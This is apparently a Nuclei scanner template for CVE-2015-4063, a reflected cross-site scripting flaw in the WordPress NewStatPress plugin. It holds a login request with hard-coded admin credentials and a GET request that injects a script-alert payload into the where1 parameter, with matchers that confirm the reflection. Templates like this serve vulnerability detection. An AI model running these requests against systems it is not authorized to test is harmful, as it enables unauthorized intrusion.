47 lines
1.6 KiB
YAML
47 lines
1.6 KiB
YAML
id: CVE-2015-4063
|
|
|
|
info:
|
|
name: NewStatPress <0.9.9 - Cross-Site Scripting
|
|
author: r3Y3r53
|
|
severity: medium
|
|
description: |
|
|
WordPress NewStatPress plugin before 0.9.9 contains a cross-site scripting vulnerability in includes/nsp_search.php. The plugin allows remote authenticated users to inject arbitrary web script or HTML via the where1 parameter in the nsp_search page to wp-admin/admin.php.
|
|
reference:
|
|
- https://packetstormsecurity.com/files/132038/
|
|
- https://wordpress.org/plugins/newstatpress/
|
|
- http://packetstormsecurity.com/files/132038/WordPress-NewStatPress-0.9.8-Cross-Site-Scripting-SQL-Injection.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-4063
|
|
remediation: Update to plugin version 0.9.9 or latest.
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 5.4
|
|
cve-id: CVE-2015-4063
|
|
cwe-id: CWE-80
|
|
metadata:
|
|
max-request: 2
|
|
verified: "true"
|
|
tags: cve,cve2015,xss,wordpress,wp-plugin,wp,newstatpress,packetstorm
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
log=admin&pwd=admin123&wp-submit=Log+In
|
|
|
|
- |
|
|
GET /wp-admin/admin.php?where1=<script>alert(document.domain)</script>&searchsubmit=Buscar&page=nsp_search HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
cookie-reuse: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code_2 == 200'
|
|
- "contains(body_2, '<script>alert(document.domain)</script>') && contains(body_2, 'newstatpress')"
|
|
condition: and
|
|
|
|
# Enhanced by md on 2023/03/13
|